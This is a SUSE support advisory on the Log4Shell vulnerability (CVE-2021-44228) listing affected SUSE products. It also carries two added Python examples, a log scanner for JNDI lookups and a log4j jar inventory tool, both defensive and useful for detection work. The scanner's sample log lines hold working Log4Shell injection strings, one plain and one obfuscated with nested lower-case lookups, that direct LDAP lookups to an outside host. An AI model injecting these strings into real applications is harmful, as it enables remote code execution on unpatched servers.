Security vulnerability: log4j remote code execution aka log4shell CVE-2021-44228

This document (000020526) is provided subject to the disclaimer at the end of this document.

Environment

All products

Situation

A 0-day exploit in the log4j Java logging framework was found by Chen Zhaojun of Alibaba Cloud Security Team. It allows remote attackers who can inject strings into log4j-based Java logging to execute code by exploiting the JNDI bindings that are enabled by default. Exploitation requires no preconditions, which makes the vulnerability critical.
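The attack surface described above is a logged string containing a lookup that log4j resolves at logging time. As an added example, not part of the SUSE advisory, the Python script below runs detection logic over constructed access-log lines: it folds nested `${lower:}`, `${upper:}` and `${name:-default}` lookups inside-out (a literal search for `${jndi:` misses a lookup wrapped in them) and flags any line whose normalized form contains a `${jndi:` lookup. The log lines and the 198.51.100.7 address are constructed test data.

```python
"""Flag log lines that contain a log4j JNDI lookup, after resolving nested lookups."""
import re
from typing import List, Tuple

# Constructed sample log lines (not from the advisory). The final quoted field is the
# User-Agent, a typical value that a Java application passes through log4j.
SAMPLE_LOG_LINES = [
    '203.0.113.9 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 12 "-" "curl/7.79"',
]

# An innermost lookup: ${...} whose body contains no further '$' or braces.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The lookup that reaches the JNDI code path once the wrappers are resolved.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(match: "re.Match") -> str:
    """Resolve the lookups commonly used as wrappers; leave everything else untouched."""
    body = match.group(1)
    key = body.lower()
    if key.startswith("lower:"):
        return body[len("lower:"):].lower()
    if key.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                      # ${name:-default} -> default
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Fold wrapper lookups inside-out until the text reaches a fixed point."""
    for _ in range(max_rounds):
        folded = _INNER_LOOKUP.sub(_resolve_one, text)
        if folded == text:
            break
        text = folded
    return text


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalized line) for every line with a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        if _JNDI.search(normalized):
            hits.append((n, normalized))
    return hits


if __name__ == "__main__":
    for n, normalized in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: JNDI lookup found -> {normalized}")
```

Lines 2 and 3 are reported; line 4 contains a lookup but not a JNDI one, so it is not. Running the check on normalized text rather than the raw line is the point: the same detector then covers both the plain and the wrapped form of the lookup.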

Resolution

SUSE considers log4j versions 2.0 and newer affected. log4j 1.2.x does not have the same critical vulnerability and is not considered affected by this CVE.

SUSE Linux Enterprise products do not ship log4j 2.x.
SUSE Manager does not ship log4j 2.x.
SUSE Enterprise Storage does not ship log4j 2.x.
SUSE Openstack Cloud embeds log4j2 in the "storm" component, which will receive updates.
SUSE NeuVector product does not ship log4j 2.x.

SUSE Rancher is not affected by this vulnerability. The Helm chart for Istio 1.5, provided by Rancher and currently deprecated, includes Zipkin and is vulnerable to this log4j issue. Customers are advised to upgrade to the recent Istio version provided in Cluster Explorer, which does not use Zipkin and is not affected by the vulnerability.

If you deploy your own Java application stacks, please refer to the upstream guidance from the log4j project on fixes and mitigation measures.
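The statements above cover the log4j copies that SUSE packages; anything you deploy yourself needs its own inventory. As an added example, not taken from the advisory or from the log4j project, the Python script below walks a directory tree, identifies log4j jars by package prefix (including jars bundled inside WAR or fat-jar archives), reads the version from the manifest or the file name, and applies this advisory's criterion: 2.x is affected, 1.2.x is not. It also reports whether JndiLookup.class is still present in a 2.x core jar, because removing that class from log4j-core was part of upstream's published mitigation; that detail comes from upstream's guidance, not from this page. The jars scanned by demo() are constructed fixtures with empty class bodies, and the version strings in them are constructed sample values.

```python
"""Inventory log4j jars under a directory and classify them by the advisory's criterion."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Iterator, List, Optional

# The log4j 2.x class behind the JNDI code path (upstream mitigation guidance, not from the SUSE page).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J2_CORE_PREFIX = "org/apache/logging/log4j/core/"
LOG4J1_PREFIX = "org/apache/log4j/"
_VERSION_IN_NAME = re.compile(r"-(\d+(?:\.\d+)+)\.jar$")


@dataclass
class Finding:
    path: str          # nested jars are reported as outer.war!WEB-INF/lib/inner.jar
    major: int         # 1 or 2
    version: str       # Implementation-Version from the manifest, else from the file name
    jndi_lookup: bool  # JndiLookup.class still present
    verdict: str


def _manifest_version(zf: zipfile.ZipFile) -> Optional[str]:
    try:
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in text.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def classify_jar(zf: zipfile.ZipFile, path: str) -> Optional[Finding]:
    """Package-prefix heuristic: 2.x core classes -> 2.x; org.apache.log4j classes -> 1.x."""
    names = set(zf.namelist())
    if any(n.startswith(LOG4J2_CORE_PREFIX) for n in names):
        major = 2
    elif any(n.startswith(LOG4J1_PREFIX) for n in names):
        major = 1
    else:
        return None
    m = _VERSION_IN_NAME.search(os.path.basename(path))
    version = _manifest_version(zf) or (m.group(1) if m else "unknown")
    has_jndi = JNDI_LOOKUP_CLASS in names
    if major == 1:
        verdict = "log4j 1.x: not affected by CVE-2021-44228 per this advisory"
    elif has_jndi:
        verdict = "log4j 2.x with JndiLookup.class: treat as affected, apply upstream fix"
    else:
        verdict = "log4j 2.x without JndiLookup.class: class removed, still confirm the version"
    return Finding(path, major, version, has_jndi, verdict)


def _scan_archive(zf: zipfile.ZipFile, path: str, depth: int = 0) -> Iterator[Finding]:
    found = classify_jar(zf, path)
    if found:
        yield found
    if depth >= 2:                     # bound recursion for jar-in-war-in-ear layouts
        return
    for name in zf.namelist():         # log4j bundled inside the application archive
        if name.lower().endswith(".jar"):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    yield from _scan_archive(inner, f"{path}!{name}", depth + 1)
            except zipfile.BadZipFile:
                continue


def scan_tree(root: str) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith((".jar", ".war", ".ear")):
                full = os.path.join(dirpath, name)
                try:
                    with zipfile.ZipFile(full) as zf:
                        findings.extend(_scan_archive(zf, full))
                except zipfile.BadZipFile:
                    continue
    return findings


def _write_jar(path: str, entries: dict) -> None:
    with zipfile.ZipFile(path, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)


def build_sample_tree(root: str) -> None:
    """Constructed fixtures: fake jars with realistic entry names and empty class bodies."""
    _write_jar(os.path.join(root, "log4j-core-2.14.1.jar"), {
        "META-INF/MANIFEST.MF": "Manifest-Version: 1.0\nImplementation-Version: 2.14.1\n",
        LOG4J2_CORE_PREFIX + "Logger.class": b"", JNDI_LOOKUP_CLASS: b""})
    _write_jar(os.path.join(root, "log4j-1.2.17.jar"), {
        "META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n", LOG4J1_PREFIX + "Logger.class": b""})
    buf = io.BytesIO()                 # 2.x core with JndiLookup removed, bundled in a WAR
    with zipfile.ZipFile(buf, "w") as inner:
        inner.writestr(LOG4J2_CORE_PREFIX + "Logger.class", b"")
    _write_jar(os.path.join(root, "app.war"), {"WEB-INF/lib/log4j-core-2.14.1.jar": buf.getvalue()})


def demo() -> List[Finding]:
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: log4j {f.version} (JndiLookup={f.jndi_lookup}) -> {f.verdict}")
```

Point scan_tree() at an application root instead of demo() to scan a real deployment. Identifying jars by package prefix rather than by file name is deliberate: relocated or shaded copies keep their class paths even when the jar name no longer says log4j.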

Status

Security Alert

Additional Information

Note regarding SUSE Manager Server:
The CVE search uses metadata within a patch to display the required information. As no patch is needed (SUSE is not affected), the CVE search for CVE-2021-44228 will return "not found".


Disclaimer

This Support Knowledgebase provides a valuable tool for SUSE customers and parties interested in our products and solutions to acquire information, ideas and learn from one another. Materials are provided for informational, personal or non-commercial use within your organization and are presented "AS IS" WITHOUT WARRANTY OF ANY KIND.

  • Document ID: 000020526
  • Creation Date: 15-Dec-2021
  • Modified Date: 15-Dec-2021
    • SUSE Enterprise Storage
    • SUSE Linux Enterprise Server
    • SUSE Open Stack Cloud
    • SUSE Manager
    • SUSE Rancher
